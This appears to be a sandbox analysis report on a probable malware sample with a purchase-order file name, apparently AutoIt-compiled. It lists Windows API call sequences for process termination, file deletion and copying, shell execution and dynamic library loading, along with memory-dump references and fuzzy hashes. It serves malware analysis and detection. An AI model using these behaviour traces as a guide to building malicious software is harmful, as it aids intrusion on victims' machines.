                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 001AEB55
                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001AEB64
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001AEB6E
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001AEB75
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                    • String ID:
                                                                                    • API String ID: 839392675-0
                                                                                    • Opcode ID: f6b43f29fd0ae545836bc3a053df73e543ec774e162d77a405ad738edfb1ba58
                                                                                    • Instruction ID: 6d32b737476b859dd11ee4233c81d35ddbcd0b2afa69746fdacc5591ff5178e1
                                                                                    • Opcode Fuzzy Hash: f6b43f29fd0ae545836bc3a053df73e543ec774e162d77a405ad738edfb1ba58
                                                                                    • Instruction Fuzzy Hash: 79F09072143129BBEB205B529C0DEEF3B7CEFCAB11F00055AF601D1590D7A05A41C6F4
                                                                                    APIs
                                                                                    • GetClientRect.USER32(?), ref: 00197452
                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00197469
                                                                                    • GetWindowDC.USER32(?), ref: 00197475
                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00197484
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00197496
                                                                                    • GetSysColor.USER32(00000005), ref: 001974B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                    • String ID:
                                                                                    • API String ID: 272304278-0
                                                                                    • Opcode ID: b632e64756e5327da3dd0ddcf82d0c42b09e81f69481a02c63331aa79159ce27
                                                                                    • Instruction ID: 664456e0925b76c9df05c33d9e5f479b79725a5198737c4d5b93008ecd66bf3c
                                                                                    • Opcode Fuzzy Hash: b632e64756e5327da3dd0ddcf82d0c42b09e81f69481a02c63331aa79159ce27
                                                                                    • Instruction Fuzzy Hash: C2018B31506216EFDB105FA4EC08BEEBBB6FF04311F110561F925A35A1CB311E91EB91
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001A187F
                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 001A188B
                                                                                    • CloseHandle.KERNEL32(?), ref: 001A1894
                                                                                    • CloseHandle.KERNEL32(?), ref: 001A189C
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A18A5
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001A18AC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                    • String ID:
                                                                                    • API String ID: 146765662-0
                                                                                    • Opcode ID: a203ea22ef358bf600f5cf768a4c904509b866a0bc5525d59ecfe0985be25ade
                                                                                    • Instruction ID: eac9086b978282eb27bd35878d80d1d2663d3aa78684909bb9b9442383c5fed9
                                                                                    • Opcode Fuzzy Hash: a203ea22ef358bf600f5cf768a4c904509b866a0bc5525d59ecfe0985be25ade
                                                                                    • Instruction Fuzzy Hash: AAE0ED36046112FBDB016FA1ED0C905BF39FF497227108A22F225818B0CB3254A0DF90
                                                                                    APIs
                                                                                    • __Init_thread_footer.LIBCMT ref: 0014BEB3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footer
                                                                                    • String ID: D%!$D%!$D%!$D%!D%!
                                                                                    • API String ID: 1385522511-4080940547
                                                                                    • Opcode ID: 00fc5db57fa7c214ee4fd5667caf830a807294ff9bae606d2a33032af49ff0e7
                                                                                    • Instruction ID: 0be75612581abf159567d1f67f6ddcf56f2f15a2cc3c0d32f5593f7d56d7d80c
                                                                                    • Opcode Fuzzy Hash: 00fc5db57fa7c214ee4fd5667caf830a807294ff9bae606d2a33032af49ff0e7
                                                                                    • Instruction Fuzzy Hash: 8C914D75A08206DFCB18CF98C0D06A9B7F2FF68314F658169E945AB360E731ED91CB90
                                                                                    APIs
                                                                                      • Part of subcall function 00147620: _wcslen.LIBCMT ref: 00147625
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001AC6EE
                                                                                    • _wcslen.LIBCMT ref: 001AC735
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001AC79C
                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 001AC7CA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                    • String ID: 0
                                                                                    • API String ID: 1227352736-4108050209
                                                                                    • Opcode ID: 844cdf1c47965c8a8c1994cb719e3d800312fb7e0a258f0055395efe6fd3e76e
                                                                                    • Instruction ID: 76e270ea9cfa44f7fa059bc12ae472da7ccec0b29de54ffff4100a72940873a1
                                                                                    • Opcode Fuzzy Hash: 844cdf1c47965c8a8c1994cb719e3d800312fb7e0a258f0055395efe6fd3e76e
                                                                                    • Instruction Fuzzy Hash: 895101796043019BD715DF68C885BAB77E8AF5A310F040A2DF9A5D32A0DB70D844CFD2
                                                                                    APIs
                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 001CAEA3
                                                                                      • Part of subcall function 00147620: _wcslen.LIBCMT ref: 00147625
                                                                                    • GetProcessId.KERNEL32(00000000), ref: 001CAF38
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001CAF67
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                    • String ID: <$@
                                                                                    • API String ID: 146682121-1426351568
                                                                                    • Opcode ID: f58088cbe39652ac22e7b71cbdc69cf52ea00ba8ba430fe5cbef5605d2ba035e
                                                                                    • Instruction ID: e315f40b1c2bf45d4567b83897d07657b9ee98fbbfb829b9705240656f771995
                                                                                    • Opcode Fuzzy Hash: f58088cbe39652ac22e7b71cbdc69cf52ea00ba8ba430fe5cbef5605d2ba035e
                                                                                    • Instruction Fuzzy Hash: 87714570A00619DFCB15DFA4D485A9EBBB0FF18318F44889DE816AB3A2C774ED45CB91
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 001A7206
                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001A723C
                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001A724D
                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001A72CF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                    • String ID: DllGetClassObject
                                                                                    • API String ID: 753597075-1075368562
                                                                                    • Opcode ID: b2ea579c56065e2fde32426f4c42fcc7eb3a74434b02ab9b7f8caede35e8b531
                                                                                    • Instruction ID: aa7e0097a290af099ba0943e1f4afdafb24857302925213d5e954f4b5481cd2a
                                                                                    • Opcode Fuzzy Hash: b2ea579c56065e2fde32426f4c42fcc7eb3a74434b02ab9b7f8caede35e8b531
                                                                                    • Instruction Fuzzy Hash: 85417F75605204EFDB15CF54CC84BAA7BA9EF46310F1580AEBD059F28AD7B0DA45CBA0
                                                                                    APIs
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001D3E35
                                                                                    • IsMenu.USER32(?), ref: 001D3E4A
                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001D3E92
                                                                                    • DrawMenuBar.USER32 ref: 001D3EA5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                    • String ID: 0
                                                                                    • API String ID: 3076010158-4108050209
                                                                                    • Opcode ID: e59685dd375d17eae963757fec2835134e094001f074b10c5afb5fce42a48624
                                                                                    • Instruction ID: 5ee3e772512eaa98aaaeba8477511f6f6594596bab68693579781c608be9f67f
                                                                                    • Opcode Fuzzy Hash: e59685dd375d17eae963757fec2835134e094001f074b10c5afb5fce42a48624
                                                                                    • Instruction Fuzzy Hash: AC414A75A01209AFDB10DF50E884AEABBB9FF49350F04412AE92597390D730AE55CF91
                                                                                    APIs
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                      • Part of subcall function 001A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001A3CCA
                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001A1E66
                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 001A1E79
                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 001A1EA9
                                                                                      • Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 2081771294-1403004172
                                                                                    • Opcode ID: 4bca9b16b03ab3cb9d569b493871fbbc507828cf9f0ffbc7e794960a4e90d4a2
                                                                                    • Instruction ID: d64ac6ce0536f9d7e957f82441ce7b1668f5916cd058e3d33909988d866c5148
                                                                                    • Opcode Fuzzy Hash: 4bca9b16b03ab3cb9d569b493871fbbc507828cf9f0ffbc7e794960a4e90d4a2
                                                                                    • Instruction Fuzzy Hash: CE216675A00104BEDB19ABA4DC46CFFB7B8EF53364F10451AF821A72E1DB344D0ADA60
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001D2F8D
                                                                                    • LoadLibraryW.KERNEL32(?), ref: 001D2F94
                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001D2FA9
                                                                                    • DestroyWindow.USER32(?), ref: 001D2FB1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                    • String ID: SysAnimate32
                                                                                    • API String ID: 3529120543-1011021900
                                                                                    • Opcode ID: 5b5c83e184013b0539e013550e1770318140807c8ed67a2b0488001b79f29278
                                                                                    • Instruction ID: f4a21e3fae250efe555454abfa372c7e4b1ef116dab39c9baa9334b414df2060
                                                                                    • Opcode Fuzzy Hash: 5b5c83e184013b0539e013550e1770318140807c8ed67a2b0488001b79f29278
                                                                                    • Instruction Fuzzy Hash: 4B219D71204205AFEB104F64DC84EBB77BDEF69368F104A1AFA64D72A0D771DC91A760
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00164D1E,001728E9,?,00164CBE,001728E9,002088B8,0000000C,00164E15,001728E9,00000002), ref: 00164D8D
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00164DA0
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00164D1E,001728E9,?,00164CBE,001728E9,002088B8,0000000C,00164E15,001728E9,00000002,00000000), ref: 00164DC3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: e637611abeb4145332be7343c73b41216a98dd9a7a7beafe9327de555506aa3b
                                                                                    • Instruction ID: 86544713685fa0ff5a29202d56e132bbbd5f18b6d60a5fb7b2e94b324188014b
                                                                                    • Opcode Fuzzy Hash: e637611abeb4145332be7343c73b41216a98dd9a7a7beafe9327de555506aa3b
                                                                                    • Instruction Fuzzy Hash: 89F0AF30A02219FBDB119F90DC09BEEBBB9EF58751F0001A9F805A2660CF705A90CAD0
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00144EDD,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144E9C
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00144EAE
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00144EDD,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144EC0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 145871493-3689287502
                                                                                    • Opcode ID: f445f8c4b39db2a83dc8b67c142f883d2a9b35872534c83c37c34ee1e40313ec
                                                                                    • Instruction ID: e4603957b4ea70a44fbef1215d1484e31a3027cd14164c4b9b5fd79182ab8d70
                                                                                    • Opcode Fuzzy Hash: f445f8c4b39db2a83dc8b67c142f883d2a9b35872534c83c37c34ee1e40313ec
                                                                                    • Instruction Fuzzy Hash: CDE08635A03633DBD22117256C1CB9B6658AF81B627050516FC00E2261DF64CD41C4E4
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00183CDE,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144E62
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00144E74
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00183CDE,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144E87
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 145871493-1355242751
                                                                                    • Opcode ID: b3db7d5537931450275d3128aa5a242d7ee3cb2ae430db0c5980829f91da0558
                                                                                    • Instruction ID: 416c1ee14c3a97bcd3e34482b7aa9318eb2d1228ee8edb31ab6c44eb28be443c
                                                                                    • Opcode Fuzzy Hash: b3db7d5537931450275d3128aa5a242d7ee3cb2ae430db0c5980829f91da0558
                                                                                    • Instruction Fuzzy Hash: 08D0123550363397AA221B256C18ECB6B1CAF85B513050A17B905F3165CF64CD41C5D0
                                                                                    APIs
                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001B2C05
                                                                                    • DeleteFileW.KERNEL32(?), ref: 001B2C87
                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001B2C9D
                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001B2CAE
                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001B2CC0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Delete$Copy
                                                                                    • String ID:
                                                                                    • API String ID: 3226157194-0
                                                                                    • Opcode ID: 580c257ab64aaa75c8b036429fcf3c403f9b733bfbbfe722d366efdcc67aa060
                                                                                    • Instruction ID: 916c5975aa783047aba904ff3f1ee10ae325f57b6b9c7ea7b80a36d4d4c7640b
                                                                                    • Opcode Fuzzy Hash: 580c257ab64aaa75c8b036429fcf3c403f9b733bfbbfe722d366efdcc67aa060
                                                                                    • Instruction Fuzzy Hash: 72B16E72D00119ABDF25DBA4CC85EDEBBBDEF59340F1040A6F509E7151EB309A488FA1
                                                                                    APIs
                                                                                    • GetCurrentProcessId.KERNEL32 ref: 001CA427
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001CA435
                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 001CA468
                                                                                    • CloseHandle.KERNEL32(?), ref: 001CA63D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                    • String ID:
                                                                                    • API String ID: 3488606520-0
                                                                                    • Opcode ID: cfa8482ddde0989381df944357ff9ce45107206ffa0e3b78ad22f3ce0a9c5b06
                                                                                    • Instruction ID: 459b8f0e9ba944c1eed03ae40668bf748c302d47a2b2335143f54de1c30e3a31
                                                                                    • Opcode Fuzzy Hash: cfa8482ddde0989381df944357ff9ce45107206ffa0e3b78ad22f3ce0a9c5b06
                                                                                    • Instruction Fuzzy Hash: 2FA1B1716043019FD721DF28C886F2AB7E1AF98718F54881DF96A9B392D771EC45CB82
                                                                                    APIs
                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,001E3700), ref: 0017BB91
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0021121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0017BC09
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00211270,000000FF,?,0000003F,00000000,?), ref: 0017BC36
